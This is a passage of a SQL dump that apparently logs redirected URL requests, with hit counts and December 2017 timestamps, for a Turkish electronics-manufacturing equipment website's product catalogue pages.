00:00:00',301),(17170,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',179,0,'2017-12-27 14:08:08','0000-00-00 00:00:00',301),(17171,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name',NULL,'','',188,0,'2017-12-27 14:08:42','0000-00-00 00:00:00',301),(17172,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',187,0,'2017-12-27 14:08:43','0000-00-00 00:00:00',301),(17173,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',196,0,'2017-12-27 14:22:27','0000-00-00 00:00:00',301),(17174,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',188,0,'2017-12-27 14:22:29','0000-00-00 00:00:00',301),(17175,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',199,0,'2017-12-27 14:22:32','0000-00-00 00:00:00',301),(17176,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',189,0,'2017-12-27 14:22:35','0000-00-00 00:00:00',301),(17177,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',189,0,'2017-12-27 14:22:36','0000-00-00 00:00:00',301),(17178,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name',NULL,'','',192,0,'2017-12-27 14:22:38','0000-00-00 00:00:00',301),(17179,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',179,0,'2017-12-27 14:22:39','0000-00-00 00:00:00',301),(17180,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',180,0,'2017-12-27 14:22:43','0000-00-00 00:00:00',301),(17181,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',182,0,'2017-12-27 14:22:49','0000-00-00 00:00:00',301),(17182,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',178,0,'2017-12-27 14:22:50','0000-00-00 00:00:00',301),(17183,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',170,0,'2017-12-27 14:22:53','0000-00-00 00:00:00',301),(17184,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',193,0,'2017-12-27 14:22:57','0000-00-00 00:00:00',301),(17185,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',191,0,'2017-12-27 14:22:58','0000-00-00 00:00:00',301),(17186,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',187,0,'2017-12-27 14:23:00','0000-00-00 00:00:00',301),(17187,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',185,0,'2017-12-27 14:23:01','0000-00-00 00:00:00',301),(17188,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',185,0,'2017-12-27 14:23:04','0000-00-00 00:00:00',301),(17189,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',204,0,'2017-12-27 14:23:11','0000-00-00 00:00:00',301),(17190,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',210,0,'2017-12-27 14:23:13','0000-00-00 00:00:00',301),(17191,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',203,0,'2017-12-27 14:23:16','0000-00-00 00:00:00',301),(17192,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',184,0,'2017-12-27 14:23:19','0000-00-00 00:00:00',301),(17193,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',182,0,'2017-12-27 14:23:21','0000-00-00 00:00:00',301),(17194,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',174,0,'2017-12-27 14:23:22','0000-00-00 00:00:00',301),(17195,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',186,0,'2017-12-27 14:23:24','0000-00-00 00:00:00',301),(17196,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',181,0,'2017-12-27 14:23:27','0000-00-00 00:00:00',301),(17197,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',177,0,'2017-12-27 14:23:34','0000-00-00 00:00:00',301),(17198,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',180,0,'2017-12-27 14:23:35','0000-00-00 00:00:00',301),(17199,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',175,0,'2017-12-27 14:23:38','0000-00-00 00:00:00',301),(17200,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',177,0,'2017-12-27 14:23:42','0000-00-00 00:00:00',301),(17201,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',179,0,'2017-12-27 14:23:43','0000-00-00 00:00:00',301),(17202,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',179,0,'2017-12-27 14:23:45','0000-00-00 00:00:00',301),(17203,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',177,0,'2017-12-27 14:23:46','0000-00-00 00:00:00',301),(17204,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',172,0,'2017-12-27 14:23:49','0000-00-00 00:00:00',301),(17205,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',178,0,'2017-12-27 14:23:55','0000-00-00 00:00:00',301),(17206,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',172,0,'2017-12-27 14:23:57','0000-00-00 00:00:00',301),(17207,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',178,0,'2017-12-27 14:24:00','0000-00-00 00:00:00',301),(17208,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',175,0,'2017-12-27 14:24:03','0000-00-00 00:00:00',301),(17209,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',178,0,'2017-12-27 14:24:05','0000-00-00 00:00:00',301),(17210,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',169,0,'2017-12-27 14:24:06','0000-00-00 00:00:00',301),(17211,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',176,0,'2017-12-27 14:24:08','0000-00-00 00:00:00',301),(17212,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',174,0,'2017-12-27 14:24:11','0000-00-00 00:00:00',301),(17213,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,`p`.product_sku',NULL,'','',172,0,'2017-12-27 14:24:18','0000-00-00 00:00:00',301),(17214,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',169,0,'2017-12-27 14:24:19','0000-00-00 00:00:00',301),(17215,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,category_name',NULL,'','',177,0,'2017-12-27 14:24:21','0000-00-00 00:00:00',301),(17216,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,category_name/dirdesc',NULL,'','',174,0,'2017-12-27 14:24:22','0000-00-00 00:00:00',301),(17217,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,mf_name',NULL,'','',173,0,'2017-12-27 14:24:24','0000-00-00 00:00:00',301),(17218,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,mf_name/dirdesc',NULL,'','',175,0,'2017-12-27 14:24:25','0000-00-00 00:00:00',301),(17219,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,pc.ordering,product_name',NULL,'','',175,0,'2017-12-27 14:24:27','0000-00-00 00:00:00',301),(17220,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',172,0,'2017-12-27 14:24:28','0000-00-00 00:00:00',301),(17221,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,product_name',NULL,'','',176,0,'2017-12-27 14:24:30','0000-00-00 00:00:00',301),(17222,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,product_name/dirdesc',NULL,'','',170,0,'2017-12-27 14:24:31','0000-00-00 00:00:00',301),(17223,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/dirdesc',NULL,'','',172,0,'2017-12-27 14:24:34','0000-00-00 00:00:00',301),(17224,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',173,0,'2017-12-27 14:24:39','0000-00-00 00:00:00',301),(17225,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,mf_name',NULL,'','',171,0,'2017-12-27 14:24:43','0000-00-00 00:00:00',301),(17226,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',167,0,'2017-12-27 14:24:45','0000-00-00 00:00:00',301),(17227,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',172,0,'2017-12-27 14:24:46','0000-00-00 00:00:00',301),(17228,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',174,0,'2017-12-27 14:24:48','0000-00-00 00:00:00',301),(17229,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,product_name',NULL,'','',177,0,'2017-12-27 14:24:49','0000-00-00 00:00:00',301),(17230,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,`p`.product_sku',NULL,'','',184,0,'2017-12-27 14:24:56','0000-00-00 00:00:00',301),(17231,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',176,0,'2017-12-27 14:24:57','0000-00-00 00:00:00',301),(17232,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,category_name',NULL,'','',184,0,'2017-12-27 14:24:59','0000-00-00 00:00:00',301),(17233,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',183,0,'2017-12-27 14:25:00','0000-00-00 00:00:00',301),(17234,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,mf_name',NULL,'','',188,0,'2017-12-27 14:25:04','0000-00-00 00:00:00',301),(17235,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',185,0,'2017-12-27 14:25:07','0000-00-00 00:00:00',301),(17236,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',180,0,'2017-12-27 14:25:09','0000-00-00 00:00:00',301),(17237,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',179,0,'2017-12-27 14:25:11','0000-00-00 00:00:00',301),(17238,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,product_name',NULL,'','',177,0,'2017-12-27 14:25:12','0000-00-00 00:00:00',301),(17239,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/dirdesc',NULL,'','',182,0,'2017-12-27 14:25:15','0000-00-00 00:00:00',301),(17240,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',185,0,'2017-12-27 14:25:19','0000-00-00 00:00:00',301),(17241,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',186,0,'2017-12-27 14:25:20','0000-00-00 00:00:00',301),(17242,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',215,0,'2017-12-27 14:25:26','0000-00-00 00:00:00',301),(17243,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',216,0,'2017-12-27 14:25:28','0000-00-00 00:00:00',301),(17244,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name',NULL,'','',209,0,'2017-12-27 14:25:30','0000-00-00 00:00:00',301),(17245,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',208,0,'2017-12-27 14:25:31','0000-00-00 00:00:00',301),(17246,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',205,0,'2017-12-27 14:25:34','0000-00-00 00:00:00',301),(17247,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',182,0,'2017-12-27 14:25:47','0000-00-00 00:00:00',301),(17248,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',184,0,'2017-12-27 14:25:49','0000-00-00 00:00:00',301),(17249,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,ordering',NULL,'','',205,0,'2017-12-27 14:25:57','0000-00-00 00:00:00',301),(17250,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,pc.ordering,product_name',NULL,'','',217,0,'2017-12-27 14:25:58','0000-00-00 00:00:00',301),(17251,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',216,0,'2017-12-27 14:26:00','0000-00-00 00:00:00',301),(17252,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,`p`.product_sku',NULL,'','',201,0,'2017-12-27 14:26:19','0000-00-00 00:00:00',301),(17253,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',197,0,'2017-12-27 14:26:20','0000-00-00 00:00:00',301),(17254,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,mf_name/dirdesc',NULL,'','',198,0,'2017-12-27 14:26:26','0000-00-00 00:00:00',301),(17255,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,pc.ordering,product_name',NULL,'','',208,0,'2017-12-27 14:26:30','0000-00-00 00:00:00',301),(17256,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',199,0,'2017-12-27 14:26:31','0000-00-00 00:00:00',301),(17257,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_name/dirdesc',NULL,'','',185,0,'2017-12-27 14:26:34','0000-00-00 00:00:00',301),(17258,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',194,0,'2017-12-27 14:26:51','0000-00-00 00:00:00',301),(17259,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',183,0,'2017-12-27 14:26:53','0000-00-00 00:00:00',301),(17260,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',178,0,'2017-12-27 14:26:56','0000-00-00 00:00:00',301),(17261,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',179,0,'2017-12-27 14:27:03','0000-00-00 00:00:00',301),(17262,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',185,0,'2017-12-27 14:27:04','0000-00-00 00:00:00',301),(17263,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hı',NULL,'','',177,0,'2017-12-27 14:27:15','0000-00-00 00:00:00',301),(17264,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,`p`.product_sku',NULL,'','',180,0,'2017-12-27 14:27:18','0000-00-00 00:00:00',301),(17265,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',184,0,'2017-12-27 14:27:19','0000-00-00 00:00:00',301),(17266,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',183,0,'2017-12-27 14:27:22','0000-00-00 00:00:00',301),(17267,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',192,0,'2017-12-27 14:27:29','0000-00-00 00:00:00',301),(17268,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',190,0,'2017-12-27 14:27:30','0000-00-00 00:00:00',301),(17269,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/dirdesc/results,1-10',NULL,'','',4,0,'2017-12-27 15:06:37','0000-00-00 00:00:00',301),(17270,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/dirdesc/results,1-50',NULL,'','',3,0,'2017-12-27 17:32:20','0000-00-00 00:00:00',301),(17271,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/results,1-100',NULL,'','',1,0,'2017-12-27 19:15:11','0000-00-00 00:00:00',301),(17272,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,ordering/results,1-10',NULL,'','',3,0,'2017-12-27 19:23:45','0000-00-00 00:00:00',301),(17273,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z',NULL,'','',8,0,'2017-12-27 19:33:24','0000-00-00 00:00:00',301),(17274,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-12-27 20:23:45','0000-00-00 00:00:00',301),(17275,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,ordering/results,1-20',NULL,'','',4,0,'2017-12-27 20:59:45','0000-00-00 00:00:00',301),(17276,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2017-12-27 21:23:45','0000-00-00 00:00:00',301),(17277,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,`p`.product_sku/results,1-20',NULL,'','',4,0,'2017-12-27 21:59:44','0000-00-00 00:00:00',301),(17278,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,ordering/results,1-50',NULL,'','',1,0,'2017-12-27 23:23:44','0000-00-00 00:00:00',301),(17279,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-27 23:59:45','0000-00-00 00:00:00',301),(17280,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_sku/results,1-5',NULL,'','',1,0,'2017-12-28 00:59:44','0000-00-00 00:00:00',301),(17281,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-28 01:23:44','0000-00-00 00:00:00',301),(17282,'http://www.3s-technologies.com.tr/tr/templates/att.php',NULL,'','',3,0,'2017-12-28 01:30:44','0000-00-00 00:00:00',301),(17283,'http://www.3s-technologies.com.tr/tr/templates/class.php',NULL,'','',3,0,'2017-12-28 01:30:44','0000-00-00 00:00:00',301),(17284,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2017-12-28 01:47:44','0000-00-00 00:00:00',301),(17285,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/dirdesc/results,1-50',NULL,'','',4,0,'2017-12-28 03:59:43','0000-00-00 00:00:00',301),(17286,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-28 04:35:43','0000-00-00 00:00:00',301),(17287,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-28 06:59:43','0000-00-00 00:00:00',301),(17288,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-12-28 08:33:28','0000-00-00 00:00:00',301),(17289,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku',NULL,'','',79,0,'2017-12-28 09:39:47','0000-00-00 00:00:00',301),(17290,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',79,0,'2017-12-28 09:39:49','0000-00-00 00:00:00',301),(17291,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,category_name',NULL,'','',83,0,'2017-12-28 09:40:08','0000-00-00 00:00:00',301),(17292,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,category_name/dirdesc',NULL,'','',85,0,'2017-12-28 09:40:15','0000-00-00 00:00:00',301),(17293,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name',NULL,'','',84,0,'2017-12-28 09:40:41','0000-00-00 00:00:00',301),(17294,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,mf_name/dirdesc',NULL,'','',81,0,'2017-12-28 09:40:57','0000-00-00 00:00:00',301),(17295,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,ordering',NULL,'','',84,0,'2017-12-28 09:41:36','0000-00-00 00:00:00',301),(17296,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name',NULL,'','',81,0,'2017-12-28 09:41:47','0000-00-00 00:00:00',301),(17297,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_name/dirdesc',NULL,'','',83,0,'2017-12-28 09:41:54','0000-00-00 00:00:00',301),(17298,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,product_sku',NULL,'','',81,0,'2017-12-28 09:42:00','0000-00-00 00:00:00',301),(17299,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/dirdesc',NULL,'','',82,0,'2017-12-28 09:42:10','0000-00-00 00:00:00',301),(17300,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',73,0,'2017-12-28 09:42:35','0000-00-00 00:00:00',301),(17301,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',75,0,'2017-12-28 09:42:39','0000-00-00 00:00:00',301),(17302,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name',NULL,'','',74,0,'2017-12-28 09:42:47','0000-00-00 00:00:00',301),(17303,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',78,0,'2017-12-28 09:42:51','0000-00-00 00:00:00',301),(17304,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name',NULL,'','',79,0,'2017-12-28 09:43:00','0000-00-00 00:00:00',301),(17305,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',80,0,'2017-12-28 09:43:02','0000-00-00 00:00:00',301),(17306,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,ordering',NULL,'','',80,0,'2017-12-28 09:43:24','0000-00-00 00:00:00',301),(17307,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name',NULL,'','',77,0,'2017-12-28 09:43:33','0000-00-00 00:00:00',301),(17308,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',78,0,'2017-12-28 09:43:35','0000-00-00 00:00:00',301),(17309,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_sku',NULL,'','',79,0,'2017-12-28 09:43:52','0000-00-00 00:00:00',301),(17310,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/dirdesc',NULL,'','',76,0,'2017-12-28 09:43:58','0000-00-00 00:00:00',301),(17311,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/mx200lp-de',NULL,'','',27,0,'2017-12-28 09:44:05','0000-00-00 00:00:00',301),(17312,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku',NULL,'','',81,0,'2017-12-28 09:44:19','0000-00-00 00:00:00',301),(17313,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',82,0,'2017-12-28 09:44:20','0000-00-00 00:00:00',301),(17314,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name',NULL,'','',85,0,'2017-12-28 09:44:26','0000-00-00 00:00:00',301),(17315,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',86,0,'2017-12-28 09:44:27','0000-00-00 00:00:00',301),(17316,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name',NULL,'','',84,0,'2017-12-28 09:44:34','0000-00-00 00:00:00',301),(17317,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',81,0,'2017-12-28 09:44:36','0000-00-00 00:00:00',301),(17318,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,ordering',NULL,'','',80,0,'2017-12-28 09:44:43','0000-00-00 00:00:00',301),(17319,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name',NULL,'','',78,0,'2017-12-28 09:44:46','0000-00-00 00:00:00',301),(17320,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',77,0,'2017-12-28 09:44:54','0000-00-00 00:00:00',301),(17321,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_sku',NULL,'','',78,0,'2017-12-28 09:45:15','0000-00-00 00:00:00',301),(17322,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/dirdesc',NULL,'','',80,0,'2017-12-28 09:45:27','0000-00-00 00:00:00',301),(17323,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku',NULL,'','',84,0,'2017-12-28 09:45:58','0000-00-00 00:00:00',301),(17324,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',82,0,'2017-12-28 09:46:00','0000-00-00 00:00:00',301),(17325,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name',NULL,'','',81,0,'2017-12-28 09:46:06','0000-00-00 00:00:00',301),(17326,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name/dirdesc',NULL,'','',82,0,'2017-12-28 09:46:08','0000-00-00 